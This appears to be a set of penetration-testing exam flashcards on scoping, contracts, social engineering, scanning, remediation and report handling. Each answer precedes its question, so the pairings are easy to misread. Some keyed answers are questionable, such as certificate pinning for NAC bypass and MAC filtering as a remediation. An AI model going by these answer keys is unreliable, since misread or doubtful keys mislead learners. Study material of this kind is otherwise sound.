You are performing reconnaissance as part of a gray box penetration test. You run a vulnerability scan on one of the target organization's servers and discover that port 23 is open. What does this indicate?
It is a DNS server.
You are performing reconnaissance as part of a gray box penetration test. You run a vulnerability scan on one of the target organization's servers and discover that port 53 is open. What does this indicate?
It is a TFTP server.
You are performing reconnaissance as part of a gray box penetration test. You run a vulnerability scan on one of the target organization's servers and discover that port 69 is open. What does this indicate?
It is an LDAP server.
You are performing reconnaissance as part of a gray box penetration test. You run a vulnerability scan on one of the target organization's servers and discover that ports 389 and 636 are open. What does this indicate?
It is an HTTP server.
You are performing reconnaissance as part of a gray box penetration test. You run a vulnerability scan on one of the target organization's servers and discover that ports 80 and 443 are open. What does this indicate?
It is a domain controller.
You are performing reconnaissance as part of a gray box penetration test. You run a vulnerability scan on one of the target organization's servers and discover that several ports are open, including 88, 135, 139, 389, and 464. What does this indicate?
Why is the test being performed? Who is the target audience for the test?
You are performing research that will be used to define the scope of a penetration test that your company will perform for a client. What information must be included in your research? (Choose two.)
Scoping
You are planning on setting up a security assessment. Which of the following has a major impact on the budget of the assessment?
Scope creep
You are running a penetration test for a client. The original test calls for you to test the security of one of the client's remote branch offices. The client called today and indicated that they are concerned about the security readiness of a second branch office. They insisted that you expand the penetration test to include this second site. What process occurred in this scenario?
Your laptop's IP address got blacklisted.
You are running a penetration test for a client. You are using your penetration testing toolkit running on a personal laptop to conduct scans on various network infrastructure devices, including servers, routers, and switches. Suddenly, the network has gone dark. You can no longer access any devices on the client's network. Which of the following could explain what has happened?
Hosts Networks Domains
You are scanning your client's internal network as part of a white box penetration test. Your goal is to enumerate the network. What kind of information are you likely to include in the enumeration process?
User accounts Groups Shared network folders
You are scanning your client's internal network as part of a white box penetration test. Your goal is to enumerate the network. What kind of information are you likely to include in the enumeration process?
Web pages Applications Services Tokens
You are scanning your client's internal network as part of a white box penetration test. Your goal is to enumerate the network. What kind of information are you likely to include in the enumeration process?
None of the above.
You are scoping a black box penetration test for a client. The goal is to see whether you can gain access to sensitive financial data stored on an internal database server. What should the client do prior to starting the test?
Network diagrams
You are scoping a black box penetration test for a client. The goal is to see whether you can gain access to the information stored on an internal database server. Which information should the client provide you with prior to starting the test?
Any external location
You are scoping a black box penetration test. Where should the penetration testers be physically located?
Configure certificate pinning.
You are scoping a white box penetration test for a client. The client has implemented network access controls (NAC) with IPSec to prevent devices that are out of compliance with company policies from connecting to the secure internal network. Because you are conducting a white box test, your testers' systems need to bypass NAC and be granted direct access to the secure internal network. What should the client do to accomplish this?
Network diagrams Facility maps
You are scoping a white box penetration test for a client. The goal is to see whether you can gain access to confidential customer data stored on an internal database server. You have asked the client for architectural diagrams. Which information should the client provide you with? (Choose two.)
An in-house developed desktop application used to access the information stored in the database An in-house developed web application used to generate reports using the information stored in the database
You are scoping a white box penetration test for a client. The goal is to see whether you can gain access to confidential research data stored on an internal database server. To facilitate this, you have requested that the client provide you with access to applications that end users use to generate sample application requests. Which specific applications should be included in the request? (Choose two.)
Architectural diagrams Sample requests XSD
You are scoping a white box penetration test for a client. The goal is to see whether you can gain access to confidential research data stored on an internal database server. You want to target an internally developed data collection application that the client's end users use on a daily basis to catalog and store information in the database. Which information should the client provide you with prior to starting the test?
Configuration files Data flow diagrams Software development kit (SDK) documentation
You are scoping a white box penetration test for a client. The goal is to see whether you can gain access to confidential research data stored on an internal database server. You want to target an internally developed data collection application that the client's end users use on a daily basis to catalog and store information in the database. Which information should the client provide you with prior to starting the test?
Whitelist the testers' user accounts in their intrusion prevention system (IPS). Configure security exceptions that allow the penetration testers' systems to bypass network access controls (NAC).
You are scoping a white box penetration test for a client. The goal is to see whether you can gain access to sensitive patient data stored on an internal database server. What should the client do prior to starting the test? (Choose two.)
Conduct an impact analysis with the new client and determine their tolerance to impact.
You are scoping an upcoming external black box penetration test for the client. One of your penetration testers has developed a vulnerability scanner that is very aggressive. In fact, in a previous test, her scanner brought down the client's customer-facing website for almost 30 minutes. However, by doing so, that client was able to learn a great deal about several vulnerabilities in their web application software. What should you do for the current client?
Should the test focus on a specific known vulnerability? Should the test look for unknown vulnerabilities?
You are scoping an upcoming external black box penetration test for the client. You are trying to determine what will be included in the test and what won't. Which of the following questions should you ask the client? (Choose two.)
A list of systems that are off-limits to testing
You are scoping an upcoming penetration test. You need to identify the technical constraints associated with the test. What should be included in this part of the scope documentation?
Certificate pinning
You are scoping an upcoming white box penetration test with a new client. Their network employs network access control (NAC) using IPSec. Which technique will your penetration testers need to use to enable them to access the secure internal network protected by NAC?
They are less biased than an internal team. They have the independence required to perform a thorough test.
You are the CIO for a mid-sized corporation. You are putting together a plan to implement regular penetration tests and are considering using an external penetration testing contractor. Which of the following are benefits of using an external team? (Choose two.)
There is a potential conflict of interest if they also perform testing for one of your competitors. They are usually more expensive than an internal team.
You are the CIO for a mid-sized corporation. You are putting together a plan to implement regular penetration tests and are considering using an external penetration testing contractor. Which of the following are disadvantages of using an external team? (Choose two.)
They have contextual knowledge of the organization. It's usually less expensive than using an external contractor.
You are the CIO for a mid-sized corporation. You are putting together a plan to implement regular penetration tests and are considering using an internal penetration testing team consisting of your own employees. Which of the following are benefits of using an internal team? (Choose two.)
They may feel that a vulnerability discovered may reflect poorly on them. They may lack objectivity.
You are the CIO for a mid-sized corporation. You are putting together a plan to implement regular penetration tests and are considering using an internal penetration testing team consisting of your own employees. Which of the following are disadvantages of using an internal team? (Choose two.)
Banner grabbing
You are using a Telnet client to connect to a web server in an attempt to fingerprint what type and version of web server software is running on it. What is this process called?
Search fields that echo a search string back to the user HTTP headers Input fields that echo user data
You can find XSS vulnerabilities in which of the following?
Information gathering and vulnerability identification
You have been asked to perform a black box penetration test for a medium-sized organization that sells imported motorcycles and ATVs online. In which phase of this assessment will you likely spend most of your time?
Master services agreement (MSA)
You have been asked to perform a penetration test for a client. You need a document that will set the overall terms between the two organizations. This will also be used for future work between your organizations as you plan on setting up a support agreement. What is this document called?
Nondisclosure agreement (NDA)
You have been asked to perform a penetration test for a client. You need a legal document that is used to protect the confidentiality of the client's data and other information that you may encounter. What is this legal document called?
Identify the scope of the test.
You have been asked to perform a penetration test for a medium-sized organization that sells after-market motorcycle parts online. What is the first task you should complete?
Third-party authorization
You have been asked to perform a penetration test on a large, complex IT infrastructure. Some of the scope may include contents found on a cloud network hosted by a cloud provider. What will be needed to perform this type of testing?
Scope creep
You have been contracted to perform a penetration test for an organization. The initial meetings went well, and you have well-defined rules of engagement (ROE) and target-scoping documents. Two weeks later, you are asked if you can "squeeze in another /22 subnet" for the given assessment time frame. This is a potential example of:
As soon as you start collecting data in testing phases
You have been hired to complete a penetration test for a large company. The scoping for the engagement has been completed, and you have begun your testing phases. At what point should you start writing the report?
USB key drop
You have been hired to conduct a black box penetration test for a client. You purchase a small flash drive and load it with malware that installs a keylogger on the victim's computer and sends the information it captures to you. You walk in the client's front door and ask the receptionist for directions to a nearby sports venue. While you are speaking, you deliberately drop the drive on the floor and then leave. Which exploit was used in this scenario?
Impersonation USB key drop
You have been hired to conduct a black box penetration test for a client. You purchase a small flash drive and load it with malware that sends information to you. Using reconnaissance techniques, you have identified the vendor that services the heating and air conditioning within the organization's headquarters. You dress in a similar uniform as that vendor's employees and purchase the tools they commonly use. The receptionist of the target organization allows you to enter and directs you to the mechanical room. You deliberately leave the flash drive on a user's chair as you walk by an open cubicle. Which exploits were used in this scenario? (Choose two.)
Shoulder surfing
You have been hired to conduct a black box penetration test for a client. You walk into the organization's main entrance and ask the receptionist for information about current job openings. You watch the keystrokes she types on her computer in hopes of capturing sensitive information that you can use to gain access to the internal network. What kind of exploit was used in this scenario?
Dumpster diving theHarvester
You have been hired to conduct a black box penetration test for a client. You want to use a spear phishing attack to expose the authentication credentials used by key employees of the organization. Which tools or techniques could you use to gather the information needed to conduct this attack? (Choose two.)
Press releases Executive bios
You have been hired to conduct a black box penetration test for a client. You want to use a whaling attack to expose the authentication credentials used by the organization's leadership. What information could you use to do this? (Choose two.)
Shoulder surfing Business email compromise
You have been hired to conduct a gray box penetration test for a client. You managed to walk by an employee just as she was logging on to her email account and watch the keystrokes she typed on her computer. Later that evening, after the employee has gone home for the day, you log on to her email account and send requests for information to other employees. Which exploits were used in this scenario? (Choose two.)
Nondisclosure agreement (NDA) Noncompete agreement
You have been recently hired by a security firm to conduct penetration tests on clients. Which agreements will your new employer most likely ask you to sign as a condition of employment? (Choose two.)
Local Administrator Password Solution (LAPS)
You have conducted a penetration test and are reviewing the results. You notice that the organization uses the same local administrator password on all of the systems. What tool can you use to help resolve this issue?
nmap -iL /root/targets.txt
You have created a list of target hosts that you want to scan with nmap and saved it to a text file named /root/targets.txt. Which command should you use to run the scan using this file?
An identified remote code execution vulnerability for which exploit code is publicly available in a web app exposed to the Internet.
You have identified multiple vulnerabilities during a penetration test. Which of the following findings would be most likely to merit an escalation contact with the organization-provided point of contact outside of standard meetings?
No, the confidentiality of the findings was not maintained.
You have just completed a gray box penetration test for a client. You have written up your final report and delivered it to the client. You also made sure that all access granted to you by the client to conduct the test has been disabled. You write a blog article identifying the client and the results of the assessment and post it to ensure no one else makes the same security mistakes the client made. Did you terminate the penetration test properly?
Methodology
You have just completed a penetration test for a client and are now creating a written report of your findings. You need to make sure the reader understands that you followed the PCI DSS standard while conducting the test. In which part of the report should you include this information?
Normalization of data
You have just completed a penetration test for a client. During the test, you used a variety of different tools to collect data and conduct exploits. Now you need to aggregate all of the data generated by these tools into a format that is consistent, correlated, and readable. What is this process called?
Exploit chaining
You have just completed scanning a target network and are now prioritizing activities in preparation to exploit the vulnerabilities found. The system you want to target can't be compromised with a single exploit. However, you determine that you can use multiple exploits in conjunction with each other to compromise the system. The first one gets through the system's host-based firewall. The second exploits a user account with a weak password. The third elevates privileges on the system. What is your solution called?
Write the code in C on your Linux system. Cross-compile the code.
You have just completed scanning a target network and are now prioritizing activities in preparation to exploit the vulnerabilities found. You discover that the organization still uses several older Windows Server 2003 systems that have not been properly updated and are vulnerable to a particular exploit. You decide to write a small program that will take advantage of this exploit. However, you use Kali Linux almost exclusively. What should you do to write a Windows program? (Choose two.)
Exploit modification Mapping vulnerabilities to potential exploits
You have just completed scanning a target network and are now prioritizing activities in preparation to exploit the vulnerabilities found. You discover that the organization still uses several older unsupported Windows 2000 Server systems. After performing some research, you identify several vulnerabilities associated with these systems that could be exploited. You modify the source code for a particular exploit such that it will work on these older systems and then you compile it. What are the processes you used in this scenario called? (Choose two.)
Test the modified exploit on virtual machines in a lab environment.
You have just completed scanning a target network and are now prioritizing activities in preparation to exploit the vulnerabilities found. You discover that the organization still uses several older unsupported Windows 2000 Server systems. After performing some research, you identify several vulnerabilities associated with these systems that could be exploited. You modify the source code for a particular exploit such that it will work on these older systems, and then you compile it. What should you do next?
Use directional antennae on all access points. Disable DHCP on the wireless network.
You have just concluded a black box penetration test for a client. During the test, you were able to access the organization's wireless network from the parking lot using your laptop running Aircrack-ng. In your final report, what should you recommend the client do to remediate this issue? (Choose two.)
Implement MAC address filtering. Implement 802.1x authentication.
You have just concluded a black box penetration test for a client. The organization's wireless network uses preshared keys. During the test, you were able to access the organization's wireless network from the parking lot using your laptop running Aircrack-ng. In your final report, what should you recommend the client do to remediate this issue? (Choose two.)
Change the default administrative username and password on the controller.
You have just concluded a gray box penetration test for a client. During the test, you were able to access the organization's wireless network controller device using a default administrator username and password. In your final report, what should you recommend the client do to remediate this issue?
Use FTPS for file transfers.
You have just concluded a penetration test for a client that has many remote sites. Employees at the remote sites commonly use an FTP client to copy files back and forth between their site and the home office servers. During the test, you were able to sniff these FTP sessions and capture sensitive information. In your final report, what should you recommend the client do to remediate this issue?
Technological
You have just concluded a penetration test for a client that makes extensive use of work-at-home employees. The employees use a VPN connection. During the test, you were able to use social engineering to compromise an employee's VPN connection and gain access to the internal network. As a mitigation strategy, you recommend that the client implement multifactor authentication for all VPN connections. What type of solution is this?
passwd
You have just concluded a penetration test for a client that uses a large number of temporary workers and contractors. In your findings, you report that temporary and contract user accounts are frequently not deactivated or removed when their work is complete because they frequently come back to work on new projects several months later. Given that the client uses Linux desktops and servers, which of the following Linux commands should you recommend they use to manually lock temporary or contract user accounts until the worker returns for a new project?
chage
You have just concluded a penetration test for a client that uses a large number of temporary workers and contractors. In your findings, you report that temporary and contract user accounts are frequently not deactivated or removed when their work is complete. Given that the client uses Linux desktops and servers, which of the following Linux commands should you recommend they use to automatically lock user accounts after a certain time?
Use the scp command for file transfers.
You have just concluded a penetration test for a client. During the test, you discovered that one of the Linux system administrators uses rcp to copy files between Linux servers. In your final report, what should you recommend the client do to remediate this issue?
Use SSH for remote server access.
You have just concluded a penetration test for a client. During the test, you discovered that one of the Linux system administrators uses Telnet to remotely access Linux servers. In your final report, what should you recommend the client do to remediate this issue?
People
You have just concluded a penetration test for a client. During the test, you discovered that system administrators were using unencrypted Telnet sessions to remotely manage sensitive servers. You were able to sniff network traffic and capture administrative credentials from these connections. To address this vulnerability, you recommend that the client require all IT staff to pass a network security certification exam. What type of solution is this?
Process
You have just concluded a penetration test for a client. During the test, you discovered that the organization's employees made extensive use of a shared Google Drive account to collaborate. You were able to use a social engineering exploit to get access to the shared account and access sensitive files. To address this vulnerability, you recommend that the client disallow this practice among employees. What type of solution is this?
Technological
You have just concluded a penetration test for a client. During the test, you were able to gain access to the client's physical facility by tailgating with a group of employees. To address this vulnerability, you recommend that the client implement a man-trap locking door at the entrance to the facility. What type of solution is this?
Technological
You have just concluded a penetration test for a client. During the test, you were able to gain access to the client's wireless network using Aircrack-ng while sitting in your car in a parking lot across the street. To address this vulnerability, you recommend that the client implement directional wireless network antennas and also manipulate the power level of the access points to prevent signal emanation. What type of solution is this?
Run the enable secret command on the router. Implement procedures to vet representatives from vendors.
You have just concluded a penetration test for a client. During the test, you were able to gain access to the server room by masquerading as a technician from an IT vendor. You were able to plug your laptop into the serial connector on the organization's Cisco router and access its configuration. In your final report, what should you recommend the client do to remediate this issue? (Choose two.)
Technological
You have just concluded a penetration test for a client. During the test, you were able to use John the Ripper to brute force an administrative password on a sensitive Windows file server. To address this vulnerability, you recommend that the client implement Group Policy settings that require complex passwords as well as lock the system after three incorrect logon attempts. What type of solution is this?
People
You have just concluded a penetration test for a client. During the test, you were able to use a phishing exploit to collect authentication credentials from several employees. To address this vulnerability, you recommend that the client conduct a mandatory security awareness training session for all employees. What type of solution is this?
People
You have just concluded a penetration test for a client. During the test, you were able to use social engineering techniques to gain access to the server room inside the client's facility. To address this vulnerability, you recommend that the client require security awareness training for all employees every six months. What type of solution is this?
Process
You have just concluded a penetration test for a client. During the test, you were able to use social engineering to convince the organization's accounts payable clerk to send a large ACH payment to a fictitious bank account. To address this vulnerability, you recommend that the client implement division of duties such that two individuals must sign off on all payouts. What type of solution is this?
Process
You have just concluded a penetration test for a client. During the test, you were able to use stale user accounts associated with former employees to gain access to a sensitive file server. To address this vulnerability, you recommend that the client remove user accounts whenever an employee leaves the organization. What type of solution is this?
Randomize the local Administrator credentials.
You have just concluded a penetration test for a client. In your findings, you note that all of the Windows desktop systems in the organization have the same password assigned to the local Administrator user account. What could you recommend to remediate this problem?
Implement LAPS.
You have just concluded a penetration test for a client. In your findings, you note that all of the Windows desktop systems in the organization have the same password assigned to the local Administrator user account. When you report this to the client, they indicate that they are aware of this and that they did this deliberately to reduce management complexity. What solution could you recommend that would remediate the vulnerability without increasing management complexity?
netstat
You have just concluded a penetration test for a client. In your findings, you report that a Linux database server has a large number of unnecessary open services, increasing its attack surface. In your final report, you recommend that the client analyze the system and remove any applications or services that aren't required for its role. Which tool should you suggest they use to check for listening network ports on the server?
Reconfigure the system to send log entries to a dedicated log server.
You have just concluded a penetration test for a client. In your findings, you report that a Linux database server shows evidence of having been compromised in the past. The attacker tried to cover his or her tracks by manually modifying the local log files but missed one key entry that revealed the compromise. What should you recommend the client do?
Uninstall all unnecessary services from the server.
You have just concluded a penetration test for a client. In your findings, you report that a Linux web server in the data center has the Apache web server, MySQL database, DNS, CUPS, DHCP, IMAP, and POP3 services running. What should you recommend the client do to remediate this situation?
Escape data.
You have just concluded a penetration test for a client. In your findings, you report that a web application that was developed in-house and that the organization uses to manage customer orders is susceptible to SQL injection attacks. What should you recommend the client do to remediate this?
Rewrite the code to sanitize user input.
You have just concluded a penetration test for a client. In your findings, you report that a web application that was developed in-house and that the organization uses to manage customer orders is susceptible to SQL injection attacks. What should you recommend the client do to remediate this?
Account lockout threshold
You have just concluded a penetration test for a client. In your findings, you report that brute-force password attacks against Windows domain user accounts were successful because nothing stopped the password-cracking software from trying password after password for a given user. Which of the following Windows domain Group Policy settings could you recommend the client implement to remediate this issue?
chage
You have just concluded a penetration test for a client. In your findings, you report that users are allowed to keep the same password indefinitely, which increases the likelihood that they will be compromised at some point. Given that the client uses Linux desktops and servers, which of the following Linux commands should you recommend they use to fix this issue?
Fingerprint scan.
You have just concluded a penetration test for a client. In your findings, you report that users are required to provide a username and a password to authenticate. You recommend that the organization implement multifactor authentication. Which of the following could they require users to supply when authenticating to accomplish this?
/etc/shadow
You have just concluded a penetration test for a client. In your findings, you report that you found several user accounts on a Linux file server that have no password assigned to them. In your final report, you recommend that the client analyze the system and assign passwords to all user accounts. Which file on the server should they review to accomplish this?
Password must meet complexity requirements. Minimum password length.
You have just concluded a penetration test for a client. In your findings, you report that you were able to compromise several users' Windows accounts because they used passwords such as password, aaa, and 1234. Which of the following domain Group Policy settings could you recommend they implement to prevent weak password complexity? (Choose two.)
chage
You have just concluded a penetration test for a client. In your findings, you report that, while users are trained to change their passwords every 45 days, few of them actually do it because there is no mechanism in place to enforce this policy. Given that the client uses Linux desktops and servers, which of the following Linux commands should you recommend they use to automatically lock user accounts if users don't change their passwords after 45 days?
People
You have just concluded a penetration test for a client. The client has more than 2,000 employees, but only two of them are network administrators. During the test, you were able to quickly overwhelm them with the sheer volume of your attacks. To address this vulnerability, you recommend that the client hire additional network administrators who have cybersecurity credentials and experience. What type of solution is this?
Depends on the client contract
You have just finished writing a report of findings for a client after a penetration test. How long is your organization required to store the document after the test is complete?
Burn the report to an optical disk and store it in a locked safe bolted to your desk.
You have just finished writing a report of findings for a client after a penetration test. Which of the following is an appropriate way to store your client's written report of findings?
Print a hard copy and store it in a locked filing cabinet that has been bolted to the floor.
You have just finished writing a report of findings for a client after a penetration test. Which of the following is an appropriate way to store your client's written report of findings?
Save it to an encrypted file on a file server.
You have just finished writing a report of findings for a client after a penetration test. Which of the following is an appropriate way to store your client's written report of findings?
Save the file to an encrypted flash drive and store it in a locked cabinet.
You have just finished writing a report of findings for a client after a penetration test. Which of the following is an appropriate way to store your client's written report of findings?
Review the PCI-DSS requirements.
You have just met with a new client that has requested that you perform a penetration test for them. The client manages a string of retail storefronts that accept credit cards. They need you to assess whether they are PCI-DSS compliant. What should you do first in the scoping process?
A password policy must be in place.
You have just met with a new client that has requested that you perform a penetration test for them. The client manages a string of retail storefronts that accept credit cards. They need you to assess whether they are PCI-DSS compliant. Which of the following tests need to be included in the assessment?
Install and update antivirus software on all systems.
You have just met with a new client that has requested that you perform a penetration test for them. The client manages a string of retail storefronts that accept credit cards. They need you to assess whether they are PCI-DSS compliant. Which of the following tests need to be included in the assessment?
Encrypt the transmission of cardholder data. Remove all default passwords from software and hardware devices.
You have just met with a new client that has requested that you perform a penetration test for them. The client manages a string of retail storefronts that accept credit cards. They need you to assess whether they are PCI-DSS compliant. Which of the following tests need to be included in the assessment? (Choose two.)
Monitor all access to cardholder data. Restrict access to cardholder data on a need-to-know basis.
You have just met with a new client that has requested that you perform a penetration test for them. The client manages a string of retail storefronts that accept credit cards. They need you to assess whether they are PCI-DSS compliant. Which of the following tests need to be included in the assessment? (Choose two.)
Physical access to cardholder data is restricted. The cardholder data environment (CDE) is isolated from the rest of the network.
You have just met with a new client that has requested that you perform a penetration test for them. The client manages a string of retail storefronts that accept credit cards. They need you to assess whether they are PCI-DSS compliant. Which of the following tests need to be included in the assessment? (Choose two.)
Analyze the testers' written log files.
You have recently concluded a penetration test for a client, and now need to write up your final conclusions. What should you do?
tcpdump Wireshark
You need to capture packets on a wired network during the information gathering phase of a gray box penetration test. Which utilities could you use on your laptop to accomplish this? (Choose two.)
Gray box
You need to conduct a penetration test for a client that best assesses the target organization's vulnerability to a malicious insider who has the network privileges of an average employee. Which type of test should you perform?
read TargetHost
You need to create a Bash script to run an exploit against the target organization. As a part of the script, you need to prompt the user to enter a value. Which command will accept the value the user enters and assign it to a variable named TargetHost?
$TargetHost = read-host -Prompt
You need to create a PowerShell script that will prompt the user to enter a value. Which command will accept the value the user enters and assign it to a variable named TargetHost?
TargetHost = input('Please enter a hostname:')
You need to create a Python script that will prompt the user to enter a value. Which command will accept the value the user enters and assign it to a variable named TargetHost?
TargetHost = gets
You need to create a Ruby script that will prompt the user to enter a value. Which command will accept the value the user enters and assign it to a variable named TargetHost?
The requesting party
You need to deliver an electronic copy of a penetration testing report to a client. Who should the copy be delivered to?
Shred the report in a cross-cut shredder.
You need to dispose of several penetration test reports from old clients. Hard copies of the reports are stored in a locked filing cabinet that has been bolted to the floor. Which of the following is the best way to do this?
Use disk wiping software on the drive.
You need to dispose of several penetration test reports from old clients. The files are stored on a removable hard drive that is stored in a locked safe. Which of the following is the best way to do this?
Smash the drives with a hammer.
You need to dispose of several penetration test reports from old clients. The files are stored on flash drives that are stored in a locked cabinet. Which of the following is the best way to do this?
Shred the discs.
You need to dispose of several penetration test reports from old clients. The files are stored on rewritable optical discs that are stored in a locked cabinet. Which of the following is the best way to do this?
Date of distribution Unique ID
You need to distribute a penetration testing report to a client. What information should you record in your distribution tracking log? (Select all that apply.)
Schedule the scan to run in the early hours of the morning.
You need to perform a vulnerability scan as part of a gray box penetration test. The rules of engagement specify that the internal system administrators are not to receive any warning of when your scan will occur, that you are to avoid detection, and that your scan should gather as much information as possible. What should you do?
Throttle the scan to use minimal bandwidth.
You need to perform a vulnerability scan as part of a gray box penetration test. The rules of engagement specify that the internal system administrators are not to receive any warning of when your scan will occur, that you are to avoid detection, and that your scan should gather as much information as possible. What should you do?
Assigning the SGID special permission Assigning the SUID special permission
You need to use privilege escalation on a Linux system during a penetration test. Which features of the operating system can be used to allow an executable to be run with superuser-level permissions? (Choose two.)
Include a disclaimer in the agreement indicating that the results are valid only at the point in time when the test was performed.
You own a small penetration testing consulting firm. You are worried that a client may sue you months or years after penetration testing is complete if their network is compromised by an exploit that didn't exist when the test was conducted. What should you do?
Include a disclaimer in the agreement indicating that the test methodology can impact the comprehensiveness of the test.
You own a small penetration testing consulting firm. You are worried that a client who requests a black box assessment may sue you after penetration testing is complete if their network is compromised by an exploit. What should you do?
Enter completely unexpected data into the application.
You want to generate sample application requests for an in-house developed web application that a client's users use every day to complete their day-to-day tasks. How should this be done?
No, the rules of engagement (ROE) for the test should be documented and signed by both parties.
You work at a penetration testing consulting firm. An organization that you have not worked with previously calls and asks you to perform a black box assessment of its network. You agree on a price and scope over the phone. After quickly designing the test on paper, you begin execution later that afternoon. Was this test conducted properly?
Celebrate! This means the client wants to engage your firm for multiple engagements.
You work for a penetration testing consulting firm and are negotiating with a potential client. The client has suggested that your organization sign an MSA with their organization. What should you do?
White box
You work for a penetration testing firm. A client calls and asks you to perform an exhaustive test that deeply probes their infrastructure for vulnerabilities. What kind of test should you recommend?
Purchase order (PO)
You work for a penetration testing firm. A potential client called about your services. After reviewing what your organization can do, the client decides to schedule a single black box test. If they are happy with the results, they may consider future tests. Which of the following will you likely ask the client to sign first?
Nondisclosure agreement (NDA)
You work for a penetration testing firm. You go to dinner with a potential client. To demonstrate your organization's technical expertise with penetration testing, you list several of your other clients by name and describe in detail various problems your assessments discovered at each one. Which of the following was violated when you did this?
Assessing impact tolerance
You work for a penetration testing firm. You have been scoping an upcoming penetration test with a client. Within the scope document, you include verbiage warning that the methodology and techniques used for this test could potentially take critical systems offline for a period of time. You ask the client to confirm that this is acceptable. What is this an example of?
The proper signing authority
You work for a penetration testing firm. You have been scoping an upcoming penetration test with a client. You have worked with the CIO to identify the scope of the assessment, such as in- and out-of-scope systems, the methodology to be used, the techniques allowed, and the schedule. You have a final draft of the agreement ready to be signed. Who should sign it?
Red team
You work on the security team for a large organization. Your team has been tasked with conducting an internal penetration test to verify whether your organization's IT staff can adequately defend against it. What type of assessment is being used in this scenario?
Critical
You're prioritizing vulnerabilities discovered during a vulnerability scan. One vulnerability you found has a Common Vulnerability Scoring System (CVSS) score of 10. To which risk category does this vulnerability belong?
Low
You're prioritizing vulnerabilities discovered during a vulnerability scan. One vulnerability you found has a Common Vulnerability Scoring System (CVSS) score of 3.8. To which risk category does this vulnerability belong?
Medium
You're prioritizing vulnerabilities discovered during a vulnerability scan. One vulnerability you found has a Common Vulnerability Scoring System (CVSS) score of 5.3. To which risk category does this vulnerability belong?
High
You're prioritizing vulnerabilities discovered during a vulnerability scan. One vulnerability you found has a Common Vulnerability Scoring System (CVSS) score of 7.2. To which risk category does this vulnerability belong?
Enter /bin/bash ~/myexploit at the shell prompt. Enter chmod u+x ~/myexploit; then enter ~/myexploit at the shell prompt.
You've created a Bash script in your home directory on a Linux system named myexploit. How can you execute it? (Choose two.)
CERT
You've heard that Adobe has just released a security update that addresses vulnerabilities recently discovered in Photoshop. Which open source research source could you use to learn more about the update and which vulnerabilities it is intended to fix?
CAPEC
You've heard that a new physical security exploit is going around where the attacker uses a special type of key called a bump key. Which open source research source would most likely contain information about how this exploit works?
Transference
Your client hosts a large e-commerce website that sells clothing and accessories. During a penetration test, a tester was able to intercept customers' credit card numbers as they were being processed by an internal card processing application. To keep this from happening again, the client decides to outsource all credit card processing to a third-party processor. All transactions are redirected to the third-party processor such that your client never sees the actual credit card data. Which type of risk response is described in this scenario?
Penetration testing report
Your company has suffered a data breach. You are now being asked to show proof that you have been doing your due diligence to secure the environment. What can you provide to show this proof?
Situational awareness
Your organization is conducting a black box penetration test for a client. There are five members on your penetration test team. During the test, you continuously communicate with the other members of the team via email and text messaging to coordinate the timing of activities, including reconnaissance, enumeration, exploits, and so on. What is this process called?
Situational awareness
Your organization is conducting a black box penetration test for a client. There are five members on your penetration test team. During the test, you continuously communicate with the other members of the team via email and text messaging to ensure everyone knows what the others are doing. What is this process called?
Situational awareness
Your organization is conducting a black box penetration test for a client. There are three testers on your team. At the beginning of the process, you have a team meeting to plan how the test will be conducted, when certain activities will occur, and which team members will be responsible for performing specific tasks. What is this process called?
Statement of objective (SOO) Performance work statement (PWS)
Your penetration testing consulting firm has been negotiating a contract with the U.S. federal government to run penetration tests against some of its systems. Which agreements will you be asked to sign instead of a statement of work (SOW)? (Choose two.)
Domain
________ enumeration can be accomplished using various tools or simply using Google searches with the site: operator.
Risk acceptance
__________ indicates that the organization is willing to accept the level of risk associated with a given activity or process.
Unix
iOS runs on Apple hardware and is based on Darwin, an open-source OS originating from which operating system family?
Stealth scan
You are a penetration tester, and your client wants you to scan their system and go to great lengths to avoid detection. The client does not want their cybersecurity team to be aware that a penetration test is underway. What type of scan will you be performing?
Poisons
A common vulnerability in LLMNR involves an attacker spoofing an authoritative source for name resolution on a victim system by responding to LLMNR traffic over UDP port 5355 and NBT-NS traffic over UDP port 137. The attacker ________ the LLMNR service to manipulate the victim's system.
Scope creep
A penetration testing firm has not properly identified what technical and nontechnical elements will be required for a penetration test. The scope has increased, and the firm finds itself in a bad situation with a customer, as it may not have time to complete all the tests that were advertised. Which of the following terms best describes this situation?
Ethical Hacker
A person who hacks into a computer network in order to test or evaluate its security, rather than with malicious or criminal intent is considered a(n) __________.
Social engineering testing
A potential customer is looking to test the security of its network. One of the customer's primary concerns is the security awareness of its employees. Which type of test would you recommend that the company perform as part of the penetration test?
Perform man-in-the-middle (MITM) attacks
ARP spoofing can be used to do which of the following?
TCP
An Nmap _______ scan uses the underlying operating system's networking mechanisms and is typically very noisy.
SYN
An Nmap _________ scan is also known as a "half-open" scan because it doesn't open a full TCP connection.
Malvertising
In a _________ attack, a user visits a legitimate website and clicks on a malicious ad. Then the user is redirected to a malicious site and downloads malware.
When there is poor change management in the penetration testing engagement
In which of the following circumstances might you encounter scope creep?
API
REST and SOAP are examples of ____________ standards and technologies.
BGP OSPF EIGRP
Route manipulation attacks can be performed using which routing protocols?
safeguarding electronic protected health information
The HIPAA Security Rule is focused on __________________.
IoT devices
The Mirai botnet is primarily made up of which type of devices?
smb-enum-users.nse
The Nmap __________ script uses MSRPC to enumerate valid account information about the target.
Scapy
The _______ tool can be used to enumerate information about targets by using packet-crafting commands.
Malicious intent
The main difference between an ethical hacker and a nonethical hacker is that a nonethical hacker has ________.
The amount and type of risk that an organization is prepared to pursue, retain, or take
What is risk appetite?
Reconnaissance
When an attacker is planning a course of action to gain access to a target, what is the initial phase the attacker performs?
Services
When performing reconnaissance on a network, you determine which devices are alive. What would be the next thing you would want to enumerate on the live devices?
hackertarget
Which Recon-ng module can be used to gather subdomains for a target?
Internet access
Which is not a typical requirement for a penetration testing lab environment?
Black-box test
Which kind of penetration test is used by a tester who starts with very little information?
Open source intelligence
Which method of information gathering uses publicly available information sources to collect and analyze information about a target?
-sF
Which of the following Nmap options would you want to try if your SYN scans were being identified by network filters?
The contract is one of the most important documents in your engagement. It specifies the terms of the agreement and how you will get paid, and it provides clear documentation of the services that will be performed. The document should be very specific, easy to understand, and without ambiguities. Any ambiguities will likely lead to customer dissatisfaction and friction. Legal advice (by a lawyer) is always recommended for any contract.
Which of the following are true about a penetration testing engagement contract? (Select all that apply.)
Goals-based (objectives-based) assessments Compliance-based assessments
Which of the following are types of penetration testing assessments? (Select all that apply.)
Evil twin
Which of the following best describes an attack in which the threat actor creates a rogue access point and configures it exactly the same as the existing wireless network?
Open SMTP relays
Which of the following can be abused to send spoofed emails, spam, phishing, and other email-related scams?
